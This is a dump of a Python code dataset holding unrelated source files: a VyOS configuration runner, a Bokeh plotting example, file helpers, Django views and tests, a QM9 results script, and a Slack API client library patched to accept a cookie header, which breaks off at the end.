Dataset columns:
  content: string (lengths 0 to 1.05M)
  origin: string (2 classes)
  type: string (2 classes)
from cloudshell.devices.runners.configuration_runner import ConfigurationRunner

from vyos.flows.restore import VyOSRestoreFlow
from vyos.flows.save import VyOSSaveFlow


class VyOSConfigurationRunner(ConfigurationRunner):
    @property
    def restore_flow(self):
        return VyOSRestoreFlow(cli_handler=self.cli_handler, logger=self._logger)

    @property
    def save_flow(self):
        return VyOSSaveFlow(cli_handler=self.cli_handler, logger=self._logger)

    @property
    def file_system(self):
        return ""

    def get_path(self, path=''):
        """
        :param path: path to remote file storage
        :return: valid path or
        :raise Exception:
        """
        return path
nilq/baby-python
python
from numpy.random import random

from bokeh.plotting import *

output_server("markers.py example")


def myscatter(x, y, typestr):
    scatter(x, y, type=typestr,
            line_color="#6666ee", fill_color="#ee6666", fill_alpha=0.5,
            size=12, tools="pan,zoom")


def mytext(x, y, textstr):
    text(x, y, text=textstr, angle=0,
         text_color="#449944", text_align="center", text_font_size="10pt",
         tools="pan,zoom")


N = 10

hold()

myscatter(random(N)+2, random(N)+1, "circle")
myscatter(random(N)+4, random(N)+1, "square")
myscatter(random(N)+6, random(N)+1, "triangle")
myscatter(random(N)+8, random(N)+1, "asterisk")

myscatter(random(N)+2, random(N)+4, "circle_x")
myscatter(random(N)+4, random(N)+4, "square_x")
myscatter(random(N)+6, random(N)+4, "invtriangle")
myscatter(random(N)+8, random(N)+4, "x")

myscatter(random(N)+2, random(N)+7, "circle_cross")
myscatter(random(N)+4, random(N)+7, "square_cross")
myscatter(random(N)+6, random(N)+7, "diamond")
myscatter(random(N)+8, random(N)+7, "cross")

mytext([2.5], [0.5], "circle / o")
mytext([4.5], [0.5], "square")
mytext([6.5], [0.5], "triangle")
mytext([8.5], [0.5], "asterisk / *")

mytext([2.5], [3.5], "circle_x / ox")
mytext([4.5], [3.5], "square_x")
mytext([6.5], [3.5], "invtriangle")
mytext([8.5], [3.5], "x")

mytext([2.5], [6.5], "circle_cross / o+")
mytext([4.5], [6.5], "square_cross")
mytext([6.5], [6.5], "diamond")
mytext([8.5], [6.5], "cross / +")
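The snippet above targets a very old Bokeh API: output_server(), hold(), and scatter(type=...) no longer exist. A minimal sketch of the same marker grid against a recent bokeh.plotting interface might look like the following; the scatter(marker=...) keyword and the tool names are assumptions based on current Bokeh releases, not taken from the original.

# Hedged sketch: rough modern-Bokeh equivalent of the marker demo above.
# Assumes Bokeh 3.x, where figure.scatter(marker=...) replaces scatter(type=...).
from numpy.random import random
from bokeh.plotting import figure, show

N = 10
p = figure(tools="pan,wheel_zoom", title="marker demo")

for dx, marker in [(2, "circle"), (4, "square"), (6, "triangle"), (8, "asterisk")]:
    # One row of markers; fill/line colours mirror the original example.
    p.scatter(random(N) + dx, random(N) + 1, marker=marker,
              line_color="#6666ee", fill_color="#ee6666", fill_alpha=0.5, size=12)
    # Label the column underneath, as mytext() did.
    p.text(x=[dx + 0.5], y=[0.5], text=[marker],
           text_color="#449944", text_align="center", text_font_size="10pt")

show(p)  # renders to a local HTML file instead of the removed output_server()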
nilq/baby-python
python
""" 개발환경 : PyQt5 x64, Python 3.4.3 x64, Windows 8.1 x64 파일 : CryptoCommon.py 내용 : 암호에서 자주 쓰이는 변수들을 지원할 예정 """ import os class CryptoCommon: common_long_keyspace = ' !"#$%&\'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~' def __init__(self): self.message = '' self.key = 0 self.mode = '' self.letters = '' self.sourceType = False self.inputFile = '' self.outputFile = '' self.fileAccessType = False # 파일 저장 # 파일 저장 방식이 바이너리라면 바이너리방식으로 저장.... # 나중에 바이너리방식으로 통이할 것 def saveFile(self, filename, content, fileAccessType): try: if not fileAccessType: file = open(filename, mode='w', encoding='utf-8') else: file = open(filename, mode='wb') except: return False file.write(content) file.close() def loadFile(self, filename, fileAccessType): try: if not fileAccessType: file = open(filename, mode='r', encoding='utf-8') else: file = open(filename, mode='rb') except: return False content = file.read() file.close() return content def checkFileReadble(self, filename): if os.access(filename, os.R_OK): return True return False
nilq/baby-python
python
# -*- coding: utf-8 -*-
# ---------------------------------------------------------------------
# Checkpoint manager
# ---------------------------------------------------------------------
# Copyright (C) 2007-2019 The NOC Project
# See LICENSE for details
# ---------------------------------------------------------------------

# Python modules
import datetime

# Third-party modules
from django import forms

# NOC modules
from noc.lib.app.application import Application, view, HasPerm
from noc.core.forms import NOCForm
from noc.main.models.checkpoint import Checkpoint
from noc.core.translation import ugettext as _


class CheckpointAppplication(Application):
    title = _("Checkpoints")

    class PrivateCheckpointForm(NOCForm):
        comment = forms.CharField(label=_("Comment"))

    class FullCheckpointForm(NOCForm):
        comment = forms.CharField(label=_("Comment"))
        is_private = forms.BooleanField(label=_("Private"), required=False)

    @view(url="^create/$", url_name="create", access=HasPerm("create"))
    def view_create(self, request):
        if request.user.is_superuser:
            form_class = self.FullCheckpointForm
        else:
            form_class = self.PrivateCheckpointForm
        if request.POST:
            form = form_class(request.POST)
            if form.is_valid():
                Checkpoint.set_checkpoint(
                    comment=form.cleaned_data["comment"],
                    user=request.user,
                    timestamp=datetime.datetime.now(),
                    private=form.cleaned_data.get("is_private", False),
                )
                self.message_user(request, _("Checkpoint has been set"))
                return self.close_popup(request)
        else:
            form = form_class({"is_private": True})
        return self.render(request, "create.html", form=form)
nilq/baby-python
python
# -*- coding: utf-8 -*-
from sys import maxsize
from model.group import Group


def test_add_group(app):
    old_groups = app.group.get_group_list()
    added_group = Group(name="Grop1", header="Heder1", footer="Footer1")
    app.group.create(added_group)
    # length check acts as a cheap preliminary verification before the full comparison
    assert len(old_groups) + 1 == app.group.count()
    new_groups = app.group.get_group_list()
    old_groups.append(added_group)
    assert sorted(old_groups, key=Group.id_or_max) == sorted(new_groups, key=Group.id_or_max)


def test_add_group2(app):
    old_groups = app.group.get_group_list()
    added_group = Group(name="Grop1", header="Heder1", footer="Footer1")
    app.group.create(added_group)
    assert len(old_groups) + 1 == app.group.count()
    new_groups = app.group.get_group_list()
    old_groups.append(added_group)
    assert sorted(old_groups, key=Group.id_or_max) == sorted(new_groups, key=Group.id_or_max)
nilq/baby-python
python
import pytest
from django.conf import settings
from django.contrib.messages import get_messages
from django.core.exceptions import ObjectDoesNotExist
from django.urls import reverse

from tests.api_tokens_tests.factories import AuthTokenFactory
from tests.factories import UserFactory
from tests.utils import get_view_for_user


@pytest.mark.django_db
@pytest.mark.parametrize("view", ("list", "create"))
def test_logged_in_views(client, view):
    viewname = f"api-tokens:{view}"
    response = get_view_for_user(client=client, viewname=viewname, user=None)

    assert response.status_code == 302
    assert response.url == f"{settings.LOGIN_URL}?next={reverse(viewname)}"


@pytest.mark.django_db
def test_list_view_is_filtered(client):
    # AuthToken.create returns a tuple of (AuthToken, token) rather than just
    # an AuthToken, create_batch will return a list of these
    tokens = AuthTokenFactory.create_batch(2)

    response = get_view_for_user(
        client=client, viewname="api-tokens:list", user=tokens[0][0].user
    )

    assert response.status_code == 200
    assert len(response.context[-1]["object_list"]) == 1
    assert tokens[0][0] in response.context[-1]["object_list"]
    assert tokens[1][0] not in response.context[-1]["object_list"]


@pytest.mark.django_db
def test_token_is_created_for_user(client):
    user = UserFactory()

    assert not user.auth_token_set.exists()

    response = get_view_for_user(
        client=client,
        method=client.post,
        viewname="api-tokens:create",
        data={},
        user=user,
    )

    assert response.status_code == 302

    token = user.auth_token_set.get()

    assert token.expiry is None

    messages = list(get_messages(response.wsgi_request))

    assert len(messages) == 1
    assert str(messages[0]).startswith(
        f"Your new API token is:<br><br><pre>{token.token_key}"
    )


@pytest.mark.django_db
def test_user_cannot_delete_token_of_another(client):
    token, _ = AuthTokenFactory()
    user = UserFactory()

    def _delete_token(u):
        return get_view_for_user(
            client=client,
            method=client.post,
            viewname="api-tokens:delete",
            reverse_kwargs={"token_key": token.token_key},
            data={},
            user=u,
        )

    # Other user cannot delete
    assert _delete_token(user).status_code == 404

    # Ensure the token still exists
    token.refresh_from_db()

    # Token deleted by the owner
    assert _delete_token(token.user).status_code == 302

    with pytest.raises(ObjectDoesNotExist):
        token.refresh_from_db()
nilq/baby-python
python
from gfl.core.manager.node import GflNode
from gfl.core.manager.manager import NodeManager
nilq/baby-python
python
import numpy as np

targets = np.loadtxt('qm9_targets.dat', dtype=str)[:, 1]
factors = [1., 1., 27.2114, 27.2114, 27.2114, 1., 27211.4, 1., 1., 1.,
           1., 1., 0.043363, 0.043363, 0.043363, 0.043363, 1., 1., 1., 0.043363]
assert len(factors) == len(targets)

seeds = ['11', '22', '33']

mae_avg = []
mae_std = []

for target in targets:
    results = []
    for seed in seeds:
        data = np.loadtxt(
            'output/result--qm9-' + target + '--radius1--dim50--layer_hidden6'
            '--layer_output6--batch_train32--batch_test32--lr1e-4--lr_decay0.99'
            '--decay_interval10--iteration1000--seed' + seed + '.txt',
            skiprows=1)
        epoch, time, loss_train, mae_dev, mae_test = data.T
        result = mae_test[np.argmin(mae_dev)]
        results.append(result)
    mae_avg.append(np.mean(results))
    mae_std.append(np.std(results))

for i in range(len(targets)):
    print('%9s %8.4f %8.4f' % (targets[i], mae_avg[i] * factors[i], mae_std[i] * factors[i]))
nilq/baby-python
python
import json import argparse import os import io import shutil import copy import sys from datetime import datetime from pick import pick from time import sleep from urllib.parse import urlparse import requests #################### Patched - Slacker ###################### # Purpose of the patch is to allow for a cookie header to be set # so that xoxc (slack client) tokens can be used. # Copyright 2015 Oktay Sancak # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import json import requests import time ###### Slacker Utils ###### def get_api_url(method): """ Returns API URL for the given method. :param method: Method name :type method: str :returns: API URL for the given method :rtype: str """ return 'https://slack.com/api/{}'.format(method) def get_item_id_by_name(list_dict, key_name): for d in list_dict: if d['name'] == key_name: return d['id'] ########################### __version__ = '0.14.0' DEFAULT_TIMEOUT = 10 DEFAULT_RETRIES = 0 # seconds to wait after a 429 error if Slack's API doesn't provide one DEFAULT_WAIT = 20 __all__ = ['Error', 'Response', 'BaseAPI', 'API', 'Auth', 'Users', 'Groups', 'Channels', 'Chat', 'IM', 'IncomingWebhook', 'Search', 'Files', 'Stars', 'Emoji', 'Presence', 'RTM', 'Team', 'Reactions', 'Pins', 'UserGroups', 'UserGroupsUsers', 'MPIM', 'OAuth', 'DND', 'Bots', 'FilesComments', 'Reminders', 'TeamProfile', 'UsersProfile', 'IDPGroups', 'Apps', 'AppsPermissions', 'Slacker', 'Dialog', 'Conversations', 'Migration'] class Error(Exception): pass class Response(object): def __init__(self, body): self.raw = body self.body = json.loads(body) self.successful = self.body['ok'] self.error = self.body.get('error') def __str__(self): return json.dumps(self.body) # Patched # Pass the headers along to the requests call class BaseAPI(object): def __init__(self, token=None, headers=None, timeout=DEFAULT_TIMEOUT, proxies=None, session=None, rate_limit_retries=DEFAULT_RETRIES): self.headers = headers self.token = token self.timeout = timeout self.proxies = proxies self.session = session self.rate_limit_retries = rate_limit_retries def _request(self, request_method, method, **kwargs): if self.token: kwargs.setdefault('params', {})['token'] = self.token kwargs['headers'] = self.headers url = get_api_url(method) # while we have rate limit retries left, fetch the resource and back # off as Slack's HTTP response suggests for retry_num in range(self.rate_limit_retries): response = request_method( url, timeout=self.timeout, proxies=self.proxies, **kwargs ) if response.status_code == requests.codes.ok: break # handle HTTP 429 as documented at # https://api.slack.com/docs/rate-limits if response.status_code == requests.codes.too_many: time.sleep(int( response.headers.get('retry-after', DEFAULT_WAIT) )) continue response.raise_for_status() else: # with no retries left, make one final attempt to fetch the # resource, but do not handle too_many status differently response = request_method( url, timeout=self.timeout, proxies=self.proxies, **kwargs ) response.raise_for_status() response = Response(response.text) 
if not response.successful: raise Error(response.error) return response def _session_get(self, url, params=None, **kwargs): kwargs.setdefault('allow_redirects', True) return self.session.request( method='get', url=url, params=params, **kwargs ) def _session_post(self, url, data=None, **kwargs): return self.session.request( method='post', url=url, data=data, **kwargs ) def get(self, api, **kwargs): return self._request( self._session_get if self.session else requests.get, api, **kwargs ) def post(self, api, **kwargs): return self._request( self._session_post if self.session else requests.post, api, **kwargs ) class API(BaseAPI): def test(self, error=None, **kwargs): if error: kwargs['error'] = error return self.get('api.test', params=kwargs) class Auth(BaseAPI): def test(self): return self.get('auth.test') def revoke(self, test=True): return self.post('auth.revoke', data={'test': int(test)}) class Conversations(BaseAPI): def archive(self, channel): return self.post('conversations.archive', data={'channel': channel}) def close(self, channel): return self.post('conversations.close', data={'channel': channel}) def create(self, name, user_ids=None, is_private=None): if isinstance(user_ids, (list, tuple)): user_ids = ','.join(user_ids) return self.post( 'conversations.create', data={'name': name, 'user_ids': user_ids, 'is_private': is_private} ) def history(self, channel, cursor=None, inclusive=None, latest=None, oldest=None, limit=None): return self.get( 'conversations.history', params={ 'channel': channel, 'cursor': cursor, 'inclusive': inclusive, 'latest': latest, 'oldest': oldest, 'limit': limit } ) def info(self, channel, include_locale=None, include_num_members=None): return self.get( 'conversations.info', params={ 'channel': channel, 'include_locale': include_locale, 'include_num_members': include_num_members } ) def invite(self, channel, users): if isinstance(users, (list, tuple)): users = ','.join(users) return self.post( 'conversations.invite', data={'channel': channel, 'users': users} ) def join(self, channel): return self.post('conversations.join', data={'channel': channel}) def kick(self, channel, user): return self.post( 'conversations.kick', data={'channel': channel, 'user': user} ) def leave(self, channel): return self.post('conversations.leave', data={'channel': channel}) def list(self, cursor=None, exclude_archived=None, types=None, limit=None): if isinstance(types, (list, tuple)): types = ','.join(types) return self.get( 'conversations.list', params={ 'cursor': cursor, 'exclude_archived': exclude_archived, 'types': types, 'limit': limit } ) def members(self, channel, cursor=None, limit=None): return self.get( 'conversations.members', params={'channel': channel, 'cursor': cursor, 'limit': limit} ) def open(self, channel=None, users=None, return_im=None): if isinstance(users, (list, tuple)): users = ','.join(users) return self.post( 'conversations.open', data={'channel': channel, 'users': users, 'return_im': return_im} ) def rename(self, channel, name): return self.post( 'conversations.rename', data={'channel': channel, 'name': name} ) def replies(self, channel, ts, cursor=None, inclusive=None, latest=None, oldest=None, limit=None): return self.get( 'conversations.replies', params={ 'channel': channel, 'ts': ts, 'cursor': cursor, 'inclusive': inclusive, 'latest': latest, 'oldest': oldest, 'limit': limit } ) def set_purpose(self, channel, purpose): return self.post( 'conversations.setPurpose', data={'channel': channel, 'purpose': purpose} ) def set_topic(self, channel, topic): 
return self.post( 'conversations.setTopic', data={'channel': channel, 'topic': topic} ) def unarchive(self, channel): return self.post('conversations.unarchive', data={'channel': channel}) class Dialog(BaseAPI): def open(self, dialog, trigger_id): return self.post('dialog.open', data={ 'dialog': json.dumps(dialog), 'trigger_id': trigger_id, }) class UsersProfile(BaseAPI): def get(self, user=None, include_labels=False): return super(UsersProfile, self).get( 'users.profile.get', params={'user': user, 'include_labels': int(include_labels)} ) def set(self, user=None, profile=None, name=None, value=None): return self.post('users.profile.set', data={ 'user': user, 'profile': profile, 'name': name, 'value': value }) class UsersAdmin(BaseAPI): def invite(self, email, channels=None, first_name=None, last_name=None, resend=True): return self.post('users.admin.invite', params={ 'email': email, 'channels': channels, 'first_name': first_name, 'last_name': last_name, 'resend': resend }) class Users(BaseAPI): def __init__(self, *args, **kwargs): super(Users, self).__init__(*args, **kwargs) self._profile = UsersProfile(*args, **kwargs) self._admin = UsersAdmin(*args, **kwargs) @property def profile(self): return self._profile @property def admin(self): return self._admin def info(self, user, include_locale=False): return self.get('users.info', params={'user': user, 'include_locale': include_locale}) def list(self, presence=False): return self.get('users.list', params={'presence': int(presence)}) def identity(self): return self.get('users.identity') def set_active(self): return self.post('users.setActive') def get_presence(self, user): return self.get('users.getPresence', params={'user': user}) def set_presence(self, presence): return self.post('users.setPresence', data={'presence': presence}) def get_user_id(self, user_name): members = self.list().body['members'] return get_item_id_by_name(members, user_name) class Groups(BaseAPI): def create(self, name): return self.post('groups.create', data={'name': name}) def create_child(self, channel): return self.post('groups.createChild', data={'channel': channel}) def info(self, channel): return self.get('groups.info', params={'channel': channel}) def list(self, exclude_archived=None): return self.get('groups.list', params={'exclude_archived': exclude_archived}) def history(self, channel, latest=None, oldest=None, count=None, inclusive=None): return self.get('groups.history', params={ 'channel': channel, 'latest': latest, 'oldest': oldest, 'count': count, 'inclusive': inclusive }) def invite(self, channel, user): return self.post('groups.invite', data={'channel': channel, 'user': user}) def kick(self, channel, user): return self.post('groups.kick', data={'channel': channel, 'user': user}) def leave(self, channel): return self.post('groups.leave', data={'channel': channel}) def mark(self, channel, ts): return self.post('groups.mark', data={'channel': channel, 'ts': ts}) def rename(self, channel, name): return self.post('groups.rename', data={'channel': channel, 'name': name}) def replies(self, channel, thread_ts): return self.get('groups.replies', params={'channel': channel, 'thread_ts': thread_ts}) def archive(self, channel): return self.post('groups.archive', data={'channel': channel}) def unarchive(self, channel): return self.post('groups.unarchive', data={'channel': channel}) def open(self, channel): return self.post('groups.open', data={'channel': channel}) def close(self, channel): return self.post('groups.close', data={'channel': channel}) def 
set_purpose(self, channel, purpose): return self.post('groups.setPurpose', data={'channel': channel, 'purpose': purpose}) def set_topic(self, channel, topic): return self.post('groups.setTopic', data={'channel': channel, 'topic': topic}) class Channels(BaseAPI): def create(self, name): return self.post('channels.create', data={'name': name}) def info(self, channel): return self.get('channels.info', params={'channel': channel}) def list(self, exclude_archived=None, exclude_members=None): return self.get('channels.list', params={'exclude_archived': exclude_archived, 'exclude_members': exclude_members}) def history(self, channel, latest=None, oldest=None, count=None, inclusive=False, unreads=False): return self.get('channels.history', params={ 'channel': channel, 'latest': latest, 'oldest': oldest, 'count': count, 'inclusive': int(inclusive), 'unreads': int(unreads) }) def mark(self, channel, ts): return self.post('channels.mark', data={'channel': channel, 'ts': ts}) def join(self, name): return self.post('channels.join', data={'name': name}) def leave(self, channel): return self.post('channels.leave', data={'channel': channel}) def invite(self, channel, user): return self.post('channels.invite', data={'channel': channel, 'user': user}) def kick(self, channel, user): return self.post('channels.kick', data={'channel': channel, 'user': user}) def rename(self, channel, name): return self.post('channels.rename', data={'channel': channel, 'name': name}) def replies(self, channel, thread_ts): return self.get('channels.replies', params={'channel': channel, 'thread_ts': thread_ts}) def archive(self, channel): return self.post('channels.archive', data={'channel': channel}) def unarchive(self, channel): return self.post('channels.unarchive', data={'channel': channel}) def set_purpose(self, channel, purpose): return self.post('channels.setPurpose', data={'channel': channel, 'purpose': purpose}) def set_topic(self, channel, topic): return self.post('channels.setTopic', data={'channel': channel, 'topic': topic}) def get_channel_id(self, channel_name): channels = self.list().body['channels'] return get_item_id_by_name(channels, channel_name) class Chat(BaseAPI): def post_message(self, channel, text=None, username=None, as_user=None, parse=None, link_names=None, attachments=None, unfurl_links=None, unfurl_media=None, icon_url=None, icon_emoji=None, thread_ts=None, reply_broadcast=None, blocks=None, mrkdwn=True): # Ensure attachments are json encoded if attachments: if isinstance(attachments, list): attachments = json.dumps(attachments) return self.post('chat.postMessage', data={ 'channel': channel, 'text': text, 'username': username, 'as_user': as_user, 'parse': parse, 'link_names': link_names, 'attachments': attachments, 'unfurl_links': unfurl_links, 'unfurl_media': unfurl_media, 'icon_url': icon_url, 'icon_emoji': icon_emoji, 'thread_ts': thread_ts, 'reply_broadcast': reply_broadcast, 'blocks': blocks, 'mrkdwn': mrkdwn, }) def me_message(self, channel, text): return self.post('chat.meMessage', data={'channel': channel, 'text': text}) def command(self, channel, command, text): return self.post('chat.command', data={ 'channel': channel, 'command': command, 'text': text }) def update(self, channel, ts, text, attachments=None, parse=None, link_names=False, as_user=None, blocks=None): # Ensure attachments are json encoded if attachments is not None and isinstance(attachments, list): attachments = json.dumps(attachments) return self.post('chat.update', data={ 'channel': channel, 'ts': ts, 'text': text, 
'attachments': attachments, 'parse': parse, 'link_names': int(link_names), 'as_user': as_user, 'blocks': blocks }) def delete(self, channel, ts, as_user=False): return self.post('chat.delete', data={ 'channel': channel, 'ts': ts, 'as_user': as_user }) def post_ephemeral(self, channel, text, user, as_user=None, attachments=None, link_names=None, parse=None, blocks=None): # Ensure attachments are json encoded if attachments is not None and isinstance(attachments, list): attachments = json.dumps(attachments) return self.post('chat.postEphemeral', data={ 'channel': channel, 'text': text, 'user': user, 'as_user': as_user, 'attachments': attachments, 'link_names': link_names, 'parse': parse, 'blocks': blocks }) def unfurl(self, channel, ts, unfurls, user_auth_message=None, user_auth_required=False, user_auth_url=None): return self.post('chat.unfurl', data={ 'channel': channel, 'ts': ts, 'unfurls': unfurls, 'user_auth_message': user_auth_message, 'user_auth_required': user_auth_required, 'user_auth_url': user_auth_url, }) def get_permalink(self, channel, message_ts): return self.get('chat.getPermalink', params={ 'channel': channel, 'message_ts': message_ts }) class IM(BaseAPI): def list(self): return self.get('im.list') def history(self, channel, latest=None, oldest=None, count=None, inclusive=None, unreads=False): return self.get('im.history', params={ 'channel': channel, 'latest': latest, 'oldest': oldest, 'count': count, 'inclusive': inclusive, 'unreads': int(unreads) }) def replies(self, channel, thread_ts): return self.get('im.replies', params={'channel': channel, 'thread_ts': thread_ts}) def mark(self, channel, ts): return self.post('im.mark', data={'channel': channel, 'ts': ts}) def open(self, user): return self.post('im.open', data={'user': user}) def close(self, channel): return self.post('im.close', data={'channel': channel}) class MPIM(BaseAPI): def open(self, users): if isinstance(users, (tuple, list)): users = ','.join(users) return self.post('mpim.open', data={'users': users}) def close(self, channel): return self.post('mpim.close', data={'channel': channel}) def mark(self, channel, ts): return self.post('mpim.mark', data={'channel': channel, 'ts': ts}) def list(self): return self.get('mpim.list') def history(self, channel, latest=None, oldest=None, inclusive=False, count=None, unreads=False): return self.get('mpim.history', params={ 'channel': channel, 'latest': latest, 'oldest': oldest, 'inclusive': int(inclusive), 'count': count, 'unreads': int(unreads) }) def replies(self, channel, thread_ts): return self.get('mpim.replies', params={'channel': channel, 'thread_ts': thread_ts}) class Search(BaseAPI): def all(self, query, sort=None, sort_dir=None, highlight=None, count=None, page=None): return self.get('search.all', params={ 'query': query, 'sort': sort, 'sort_dir': sort_dir, 'highlight': highlight, 'count': count, 'page': page }) def files(self, query, sort=None, sort_dir=None, highlight=None, count=None, page=None): return self.get('search.files', params={ 'query': query, 'sort': sort, 'sort_dir': sort_dir, 'highlight': highlight, 'count': count, 'page': page }) def messages(self, query, sort=None, sort_dir=None, highlight=None, count=None, page=None): return self.get('search.messages', params={ 'query': query, 'sort': sort, 'sort_dir': sort_dir, 'highlight': highlight, 'count': count, 'page': page }) class FilesComments(BaseAPI): def add(self, file_, comment): return self.post('files.comments.add', data={'file': file_, 'comment': comment}) def delete(self, file_, id_): return 
self.post('files.comments.delete', data={'file': file_, 'id': id_}) def edit(self, file_, id_, comment): return self.post('files.comments.edit', data={'file': file_, 'id': id_, 'comment': comment}) class Files(BaseAPI): def __init__(self, *args, **kwargs): super(Files, self).__init__(*args, **kwargs) self._comments = FilesComments(*args, **kwargs) @property def comments(self): return self._comments def list(self, user=None, ts_from=None, ts_to=None, types=None, count=None, page=None, channel=None): return self.get('files.list', params={ 'user': user, 'ts_from': ts_from, 'ts_to': ts_to, 'types': types, 'count': count, 'page': page, 'channel': channel }) def info(self, file_, count=None, page=None): return self.get('files.info', params={'file': file_, 'count': count, 'page': page}) def upload(self, file_=None, content=None, filetype=None, filename=None, title=None, initial_comment=None, channels=None, thread_ts=None): if isinstance(channels, (tuple, list)): channels = ','.join(channels) data = { 'content': content, 'filetype': filetype, 'filename': filename, 'title': title, 'initial_comment': initial_comment, 'channels': channels, 'thread_ts': thread_ts } if file_: if isinstance(file_, str): with open(file_, 'rb') as f: return self.post( 'files.upload', data=data, files={'file': f} ) return self.post( 'files.upload', data=data, files={'file': file_} ) return self.post('files.upload', data=data) def delete(self, file_): return self.post('files.delete', data={'file': file_}) def revoke_public_url(self, file_): return self.post('files.revokePublicURL', data={'file': file_}) def shared_public_url(self, file_): return self.post('files.sharedPublicURL', data={'file': file_}) class Stars(BaseAPI): def add(self, file_=None, file_comment=None, channel=None, timestamp=None): assert file_ or file_comment or channel return self.post('stars.add', data={ 'file': file_, 'file_comment': file_comment, 'channel': channel, 'timestamp': timestamp }) def list(self, user=None, count=None, page=None): return self.get('stars.list', params={'user': user, 'count': count, 'page': page}) def remove(self, file_=None, file_comment=None, channel=None, timestamp=None): assert file_ or file_comment or channel return self.post('stars.remove', data={ 'file': file_, 'file_comment': file_comment, 'channel': channel, 'timestamp': timestamp }) class Emoji(BaseAPI): def list(self): return self.get('emoji.list') class Presence(BaseAPI): AWAY = 'away' ACTIVE = 'active' TYPES = (AWAY, ACTIVE) def set(self, presence): assert presence in Presence.TYPES, 'Invalid presence type' return self.post('presence.set', data={'presence': presence}) class RTM(BaseAPI): def start(self, simple_latest=False, no_unreads=False, mpim_aware=False): return self.get('rtm.start', params={ 'simple_latest': int(simple_latest), 'no_unreads': int(no_unreads), 'mpim_aware': int(mpim_aware), }) def connect(self): return self.get('rtm.connect') class TeamProfile(BaseAPI): def get(self, visibility=None): return super(TeamProfile, self).get( 'team.profile.get', params={'visibility': visibility} ) class Team(BaseAPI): def __init__(self, *args, **kwargs): super(Team, self).__init__(*args, **kwargs) self._profile = TeamProfile(*args, **kwargs) @property def profile(self): return self._profile def info(self): return self.get('team.info') def access_logs(self, count=None, page=None, before=None): return self.get('team.accessLogs', params={ 'count': count, 'page': page, 'before': before }) def integration_logs(self, service_id=None, app_id=None, user=None, 
change_type=None, count=None, page=None): return self.get('team.integrationLogs', params={ 'service_id': service_id, 'app_id': app_id, 'user': user, 'change_type': change_type, 'count': count, 'page': page, }) def billable_info(self, user=None): return self.get('team.billableInfo', params={'user': user}) class Reactions(BaseAPI): def add(self, name, file_=None, file_comment=None, channel=None, timestamp=None): # One of file, file_comment, or the combination of channel and timestamp # must be specified assert (file_ or file_comment) or (channel and timestamp) return self.post('reactions.add', data={ 'name': name, 'file': file_, 'file_comment': file_comment, 'channel': channel, 'timestamp': timestamp, }) def get(self, file_=None, file_comment=None, channel=None, timestamp=None, full=None): return super(Reactions, self).get('reactions.get', params={ 'file': file_, 'file_comment': file_comment, 'channel': channel, 'timestamp': timestamp, 'full': full, }) def list(self, user=None, full=None, count=None, page=None): return super(Reactions, self).get('reactions.list', params={ 'user': user, 'full': full, 'count': count, 'page': page, }) def remove(self, name, file_=None, file_comment=None, channel=None, timestamp=None): # One of file, file_comment, or the combination of channel and timestamp # must be specified assert (file_ or file_comment) or (channel and timestamp) return self.post('reactions.remove', data={ 'name': name, 'file': file_, 'file_comment': file_comment, 'channel': channel, 'timestamp': timestamp, }) class Pins(BaseAPI): def add(self, channel, file_=None, file_comment=None, timestamp=None): # One of file, file_comment, or timestamp must also be specified assert file_ or file_comment or timestamp return self.post('pins.add', data={ 'channel': channel, 'file': file_, 'file_comment': file_comment, 'timestamp': timestamp, }) def remove(self, channel, file_=None, file_comment=None, timestamp=None): # One of file, file_comment, or timestamp must also be specified assert file_ or file_comment or timestamp return self.post('pins.remove', data={ 'channel': channel, 'file': file_, 'file_comment': file_comment, 'timestamp': timestamp, }) def list(self, channel): return self.get('pins.list', params={'channel': channel}) class UserGroupsUsers(BaseAPI): def list(self, usergroup, include_disabled=None): if isinstance(include_disabled, bool): include_disabled = int(include_disabled) return self.get('usergroups.users.list', params={ 'usergroup': usergroup, 'include_disabled': include_disabled, }) def update(self, usergroup, users, include_count=None): if isinstance(users, (tuple, list)): users = ','.join(users) if isinstance(include_count, bool): include_count = int(include_count) return self.post('usergroups.users.update', data={ 'usergroup': usergroup, 'users': users, 'include_count': include_count, }) class UserGroups(BaseAPI): def __init__(self, *args, **kwargs): super(UserGroups, self).__init__(*args, **kwargs) self._users = UserGroupsUsers(*args, **kwargs) @property def users(self): return self._users def list(self, include_disabled=None, include_count=None, include_users=None): if isinstance(include_disabled, bool): include_disabled = int(include_disabled) if isinstance(include_count, bool): include_count = int(include_count) if isinstance(include_users, bool): include_users = int(include_users) return self.get('usergroups.list', params={ 'include_disabled': include_disabled, 'include_count': include_count, 'include_users': include_users, }) def create(self, name, handle=None, 
description=None, channels=None, include_count=None): if isinstance(channels, (tuple, list)): channels = ','.join(channels) if isinstance(include_count, bool): include_count = int(include_count) return self.post('usergroups.create', data={ 'name': name, 'handle': handle, 'description': description, 'channels': channels, 'include_count': include_count, }) def update(self, usergroup, name=None, handle=None, description=None, channels=None, include_count=None): if isinstance(channels, (tuple, list)): channels = ','.join(channels) if isinstance(include_count, bool): include_count = int(include_count) return self.post('usergroups.update', data={ 'usergroup': usergroup, 'name': name, 'handle': handle, 'description': description, 'channels': channels, 'include_count': include_count, }) def disable(self, usergroup, include_count=None): if isinstance(include_count, bool): include_count = int(include_count) return self.post('usergroups.disable', data={ 'usergroup': usergroup, 'include_count': include_count, }) def enable(self, usergroup, include_count=None): if isinstance(include_count, bool): include_count = int(include_count) return self.post('usergroups.enable', data={ 'usergroup': usergroup, 'include_count': include_count, }) class DND(BaseAPI): def team_info(self, users=None): if isinstance(users, (tuple, list)): users = ','.join(users) return self.get('dnd.teamInfo', params={'users': users}) def set_snooze(self, num_minutes): return self.post('dnd.setSnooze', data={'num_minutes': num_minutes}) def info(self, user=None): return self.get('dnd.info', params={'user': user}) def end_dnd(self): return self.post('dnd.endDnd') def end_snooze(self): return self.post('dnd.endSnooze') class Migration(BaseAPI): def exchange(self, users, to_old=False): if isinstance(users, (list, tuple)): users = ','.join(users) return self.get( 'migration.exchange', params={'users': users, 'to_old': to_old} ) class Reminders(BaseAPI): def add(self, text, time, user=None): return 